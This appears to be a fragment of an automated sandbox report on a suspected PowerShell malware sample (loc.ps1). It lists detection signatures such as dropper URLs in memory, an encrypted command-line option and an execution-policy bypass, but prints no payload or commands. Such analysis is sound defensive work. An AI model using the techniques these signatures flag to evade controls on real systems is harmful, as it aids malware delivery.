Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 876995 Sample: loc.ps1 Startdate: 28/05/2023 Architecture: WINDOWS Score: 64 13 Multi AV Scanner detection for submitted file 2->13 15 Potential dropper URLs found in powershell memory 2->15 6 powershell.exe 11 2->6         started        process3 signatures4 17 Very long command line found 6->17 19 Encrypted powershell cmdline option found 6->19 21 Bypasses PowerShell execution policy 6->21 9 powershell.exe 1 39 6->9         started        11 conhost.exe 6->11         started        process5
No contacted IP infos